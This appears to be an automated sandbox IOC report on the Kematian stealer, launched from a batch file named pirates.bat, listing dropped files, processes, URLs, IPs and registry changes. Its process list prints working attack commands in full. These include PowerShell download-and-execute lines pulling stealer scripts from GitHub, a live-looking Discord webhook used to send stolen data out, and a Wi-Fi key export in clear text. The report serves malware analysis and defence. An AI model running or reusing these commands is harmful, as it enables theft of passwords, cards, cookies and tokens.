IOC Report
pirates.bat

loading gif

Files

File Path
Type
Category
Malicious
pirates.bat
Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (709), with no line terminators
dropped
malicious
C:\Users\user\Desktop\kematian.ps1
ASCII text, with very long lines (4083), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\temp.vbs
ASCII text, with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\NzE0MzRENTYtMTU0OC1FRDNELUFFRTYtQzc1QUVDRDkzQkYw_VVM=_Sk9ORVMtUEM=_MjAyNC0wNy0wNQ==_VVRDLTU=.zip
Zip archive data, at least v2.0 to extract, compression method=store
modified
C:\Users\user\AppData\Local\Temp\RES4A61.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Jul 5 05:50:52 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_131zpzyd.ao2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1a5vmr5y.2sq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1bm1p00h.32h.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1i1tugq0.vjt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34u5l0tb.05s.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3x05fz0i.xzo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_az14t1sa.5pd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_be03rlz1.vay.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cj1jyvoq.kdm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmbnujjc.fo4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwh02dx0.bdp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_etnufafd.yrh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0c21v2z.gen.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k315zlmt.dfr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syrx214o.4vl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tryhonqj.sfv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v4dkwuke.wz1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnego4zw.r1s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm3a5dwt.fla.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_znu5b3yu.qat.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\autofill.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\cards.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\cookies_netscape_Chrome.txt
ASCII text, with very long lines (522)
dropped
C:\Users\user\AppData\Local\Temp\discord.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\downloads.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\history.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.0.cs
Unicode text, UTF-8 (with BOM) text
dropped
C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.out
Unicode text, UTF-8 (with BOM) text, with very long lines (791), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\passwords.json
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\screenshot.png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\DomainDetects\Chrome.txt
ASCII text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\DomainDetects\Edge.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\DomainDetects\Firefox.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\System.txt
Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\productkey.txt
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-05)-(UTC-5)\screenshot.png (copy)
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
data
dropped
C:\Users\user\Desktop\kdotAqIoB.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotPUzdp.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotfQjio.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotkccaDE.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotljBUkx.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotmZyXn.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotnqUTZ.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdotqzBNDv.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\kdottNmtN.bat
DOS batch file, ASCII text, with CRLF line terminators
modified
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 47 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
malicious
C:\Windows\System32\wscript.exe
wscript /b
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1
malicious
C:\Windows\System32\netsh.exe
"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cscript.exe
cscript //nologo temp.vbs
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\find.exe
find /i "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\find.exe
find /i "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\find.exe
find /i "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\net.exe
net session
C:\Windows\System32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\System32\doskey.exe
doskey CALL=SHIFT
C:\Windows\System32\attrib.exe
attrib +h +s kematian.ps1
C:\Windows\System32\find.exe
find /i "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\find.exe
find /i "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\findstr.exe
findstr /i "echo" "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\find.exe
find /i "C:\Users\user\Desktop\pirates.bat"
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
There are 33 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1
185.199.110.133
malicious
https://github.com
unknown
malicious
https://raw.githubusercontent.c
unknown
malicious
https://raw.githubusercont
unknown
malicious
https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvx
unknown
malicious
https://raw.githubusercontent.com
unknown
malicious
https://github.com/Somali-Devs/Kematian-Stealer
unknown
malicious
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
140.82.121.3
malicious
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/antivm.ps1
unknown
https://www.cloudflare.com/cdn-cgi/trace
104.16.123.96
http://www.microsoft.cv
unknown
http://crl.microsoft
unknown
https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/webcam.ps1
unknown
http://ip-api.com/json
unknown
https://contoso.com/License
unknown
https://github.cg
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
140.82.121.3
http://github.com
unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
https://oneget.orgX
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1
185.199.110.133
https://discord.X
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://github.com/ChildrenOfYahweh/Kematian-Stealer/raw/main/frontend-src/blockhosts.ps1
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1
unknown
https://contoso.com/Icon
unknown
https://aka.ms/winsvr-2022-pshelpX
unknown
http://www.microsoft.
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
https://www.cloudflare.com
unknown
https://github.com/Pester/Pester
unknown
https://objects.githubusercontent.com/github-production-release-asset-2e65be/561131198/03bdc8a9-2834
unknown
https://github.com/Somali-Devs/Kematian-Stealer/releases/download/KematianBuild/kematian.bin
140.82.121.3
http://crl.mh
unknown
https://github.com/TheWover
unknown
https://github.com/somali-devs/kematian-stealer/raw/main/frontend-src/kematian_shellcode.ps1
unknown
https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1
unknown
https://objects.githubusercontent.com
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
185.199.110.133
http://raw.githubusercontent.com
unknown
https://aka.ms/pscore68
unknown
https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/injection.js
unknown
https://oneget.org
unknown
https://discord.com/api/webhooks/1241088645289480213/opjqqaosqwrak2j4o5xsc-dugkqcfdvi3tjvq0bt27lstvx
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 47 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
github.com
140.82.121.3
malicious
raw.githubusercontent.com
185.199.110.133
malicious
ip-api.com
208.95.112.1
malicious
171.39.242.20.in-addr.arpa
unknown
malicious
www.cloudflare.com
104.16.123.96
objects.githubusercontent.com
185.199.111.133

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
140.82.121.3
github.com
United States
malicious
185.199.110.133
raw.githubusercontent.com
Netherlands
malicious
104.16.123.96
www.cloudflare.com
United States
185.199.111.133
objects.githubusercontent.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
ExecutionPolicy
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
201CC037000
trusted library allocation
page read and write
malicious
201CC032000
trusted library allocation
page read and write
malicious
179D3E94000
heap
page read and write
2813831B000
heap
page read and write
97D627F000
stack
page read and write
7FFD9BB3A000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
31100BB000
stack
page read and write
29E52620000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page execute and read and write
1AE00740000
heap
page read and write
201CA891000
heap
page read and write
2A8799E1000
direct allocation
page read and write
201E3330000
heap
page read and write
28138325000
heap
page read and write
29E387B0000
heap
page read and write
17EE78A6000
trusted library allocation
page read and write
39372FD000
stack
page read and write
29E4A1E0000
trusted library allocation
page read and write
7FFD9BC60000
trusted library allocation
page read and write
2A85A420000
heap
page readonly
3936D23000
stack
page read and write
2813BDA0000
direct allocation
page read and write
17E80379000
heap
page read and write
1F984580000
heap
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
25BE5E40000
heap
page read and write
2A858A77000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
97D5FBE000
stack
page read and write
A7569FE000
stack
page read and write
C00003F000
direct allocation
page read and write
1F984584000
heap
page read and write
29E5269D000
heap
page read and write
7FFD9BC80000
trusted library allocation
page read and write
DD0677E000
stack
page read and write
1EC56CB1000
trusted library allocation
page read and write
17E802C1000
heap
page read and write
2813831B000
heap
page read and write
201CA5C7000
heap
page execute and read and write
1EC482AC000
trusted library allocation
page read and write
201E31D0000
heap
page read and write
FF064FE000
stack
page read and write
201E32F0000
heap
page read and write
201DA991000
trusted library allocation
page read and write
1EC44E50000
heap
page read and write
29E3BDDF000
trusted library allocation
page read and write
1EC47050000
trusted library allocation
page read and write
FAB6F0F000
stack
page read and write
7FFD9BB6A000
trusted library allocation
page read and write
1DF582A8000
heap
page read and write
28138314000
heap
page read and write
7DF499360000
trusted library allocation
page execute and read and write
310F6E3000
stack
page read and write
29E52720000
heap
page execute and read and write
C000060000
direct allocation
page read and write
28138392000
heap
page read and write
1EC5ECBA000
heap
page read and write
17EE9B32000
trusted library allocation
page read and write
C000454000
direct allocation
page read and write
7FFD9BC00000
trusted library allocation
page read and write
1EC44D70000
heap
page read and write
7FFD9BB62000
trusted library allocation
page read and write
269928C000
stack
page read and write
201DAB46000
trusted library allocation
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
1EC48536000
trusted library allocation
page read and write
29E52ACE000
heap
page read and write
2813BD80000
direct allocation
page read and write
17EE866A000
trusted library allocation
page read and write
1EC5EE1E000
heap
page read and write
2813831B000
heap
page read and write
7BB73FE000
stack
page read and write
2A872AC0000
heap
page read and write
7FFD9B9AD000
trusted library allocation
page execute and read and write
C000042000
direct allocation
page read and write
7FFD9BA5C000
trusted library allocation
page execute and read and write
207C410A000
heap
page read and write
7FFD9BD1C000
trusted library allocation
page read and write
17EE5A99000
heap
page read and write
B7324FC000
stack
page read and write
2A872D15000
heap
page read and write
FF05EFE000
unkown
page read and write
E1F014E000
stack
page read and write
7BB75FE000
stack
page read and write
A756BFF000
stack
page read and write
201CBFC0000
trusted library allocation
page read and write
29E388B0000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
1EC47043000
trusted library allocation
page read and write
C0000C0000
direct allocation
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
201C8F76000
heap
page read and write
2A872CC0000
heap
page read and write
393707F000
stack
page read and write
C000416000
direct allocation
page read and write
25BE5D40000
heap
page read and write
7FFD9BD09000
trusted library allocation
page read and write
1EC44F40000
heap
page read and write
1AE1A800000
heap
page execute and read and write
7DA5C73000
stack
page read and write
1EC5F0E8000
heap
page read and write
7FFD9B9B3000
trusted library allocation
page execute and read and write
17EE5A20000
heap
page read and write
1D66E6AA000
heap
page read and write
201CA8C5000
heap
page read and write
1F984327000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
201E2FC0000
heap
page read and write
7FFD9BC2A000
trusted library allocation
page read and write
16107F40000
heap
page read and write
2A8746F9000
unclassified section
page read and write
C000038000
direct allocation
page read and write
2A874785000
unclassified section
page read and write
71BC3FD000
unkown
page read and write
E1EF3F9000
stack
page read and write
E1EEDFF000
stack
page read and write
29E4A4CB000
trusted library allocation
page read and write
7FFD9BA86000
trusted library allocation
page execute and read and write
C000487000
direct allocation
page read and write
2066B414000
heap
page read and write
C0000A4000
direct allocation
page read and write
C0003A8000
direct allocation
page read and write
2A8743DF000
unclassified section
page read and write
7FFD9BD30000
trusted library allocation
page read and write
7FFD9BB51000
trusted library allocation
page read and write
29E38A20000
heap
page read and write
179D3E9C000
heap
page read and write
2A86A7A1000
trusted library allocation
page read and write
179D1F70000
heap
page read and write
2A8743E6000
unclassified section
page write copy
29E52B9F000
heap
page read and write
2A872BC0000
heap
page read and write
2A85A710000
heap
page execute and read and write
1D66E6A0000
heap
page read and write
17E16EF0000
heap
page read and write
1AE02BFC000
trusted library allocation
page read and write
29E38770000
trusted library allocation
page read and write
29E3B274000
trusted library allocation
page read and write
17E80160000
heap
page read and write
1AE1A728000
heap
page read and write
1DF582AA000
heap
page read and write
FF05F7E000
stack
page read and write
2A873FB1000
unclassified section
page execute read
281382EE000
heap
page read and write
179D1FB8000
heap
page read and write
17EEA019000
trusted library allocation
page read and write
2813BE00000
direct allocation
page read and write
179D3A90000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
E1F058E000
stack
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
201DA9A0000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
17E16EF8000
heap
page read and write
C000136000
direct allocation
page read and write
2A873024000
direct allocation
page read and write
17EEA55F000
trusted library allocation
page read and write
FF065FB000
stack
page read and write
17E80307000
heap
page read and write
2813831B000
heap
page read and write
2A85A430000
trusted library allocation
page read and write
1AE1A714000
heap
page read and write
1EC47144000
trusted library allocation
page read and write
E1EF37E000
stack
page read and write
1EC5F0BB000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
E1EF07E000
stack
page read and write
7FFD9BC40000
trusted library allocation
page read and write
201E2CF0000
heap
page read and write
207C40E0000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
201CA5A0000
trusted library allocation
page read and write
C000484000
direct allocation
page read and write
1EC46B72000
trusted library allocation
page read and write
2813BBE0000
direct allocation
page read and write
1FF2D410000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
A111D3C000
stack
page read and write
29E387CF000
heap
page read and write
17E801DE000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
179D1FB0000
heap
page read and write
C000452000
direct allocation
page read and write
B842D7F000
stack
page read and write
7FFD9BC10000
trusted library allocation
page read and write
17EE7360000
trusted library allocation
page read and write
7FFD9BC40000
trusted library allocation
page read and write
2813BD70000
direct allocation
page read and write
2A874712000
unclassified section
page read and write
7FFD9BB92000
trusted library allocation
page read and write
1EC45036000
heap
page read and write
2066B390000
heap
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
2813BC20000
direct allocation
page read and write
179D3E90000
heap
page read and write
201CA991000
trusted library allocation
page read and write
201E3350000
heap
page read and write
39380CE000
stack
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1EC56FAD000
trusted library allocation
page read and write
1EC5F330000
heap
page read and write
201E3039000
heap
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
2813838F000
heap
page read and write
C000116000
direct allocation
page read and write
2813BBA0000
direct allocation
page read and write
17EE84CC000
trusted library allocation
page read and write
201E2FA0000
trusted library section
page read and write
29E3B250000
trusted library allocation
page read and write
17EE5A8C000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
7FFD9BE00000
trusted library allocation
page read and write
17EEA505000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9BD18000
trusted library allocation
page read and write
281382C9000
heap
page read and write
1AE1A7AC000
heap
page read and write
28138361000
heap
page read and write
C0002C1000
direct allocation
page read and write
1D66E970000
heap
page read and write
29E52786000
heap
page execute and read and write
E1F048A000
stack
page read and write
C00004F000
direct allocation
page read and write
7FFD9BB50000
trusted library allocation
page execute and read and write
201CBFF0000
trusted library allocation
page read and write
29E3A9E1000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
2A86A791000
trusted library allocation
page read and write
FF061FE000
stack
page read and write
29E4A4BD000
trusted library allocation
page read and write
201CBFB8000
trusted library allocation
page read and write
28138346000
heap
page read and write
29E387ED000
heap
page read and write
1EA08EF0000
heap
page read and write
1F984220000
heap
page read and write
29E3B4C0000
trusted library allocation
page read and write
C0004AA000
direct allocation
page read and write
29E3B7FE000
trusted library allocation
page read and write
201CA5C0000
heap
page execute and read and write
2A8589D0000
heap
page read and write
29E52B96000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
2A86CFA7000
trusted library allocation
page read and write
7FFD9BC90000
trusted library allocation
page read and write
7FFD9B9B2000
trusted library allocation
page read and write
17EE84BA000
trusted library allocation
page read and write
E1F0103000
stack
page read and write
C0000CC000
direct allocation
page read and write
C000504000
direct allocation
page read and write
1EC44E80000
heap
page read and write
2066B410000
heap
page read and write
1FF2D3D0000
heap
page read and write
201C8C30000
heap
page read and write
39370FE000
stack
page read and write
2A85AB11000
trusted library allocation
page read and write
29E52AB9000
heap
page read and write
C000000000
direct allocation
page read and write
E1F050C000
stack
page read and write
2A858AB5000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
1EC46CA0000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
28138308000
heap
page read and write
1F984300000
heap
page read and write
B7325FF000
stack
page read and write
1EC48812000
trusted library allocation
page read and write
DD063FC000
stack
page read and write
1AE0272A000
trusted library allocation
page read and write
1EC44EC0000
heap
page read and write
310FFBE000
stack
page read and write
39373F6000
stack
page read and write
1F7E95A4000
heap
page read and write
29E387A0000
heap
page readonly
2A86A7EE000
trusted library allocation
page read and write
179D200E000
heap
page read and write
393858E000
stack
page read and write
F1D29EE000
stack
page read and write
7FFD9BCE3000
trusted library allocation
page read and write
28139CFB000
direct allocation
page read and write
1EC47FFC000
trusted library allocation
page read and write
29E38900000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
FAB6236000
stack
page read and write
17E16E20000
heap
page read and write
29E52820000
heap
page read and write
17E803CB000
heap
page read and write
1EC44F24000
heap
page read and write
179D2104000
heap
page read and write
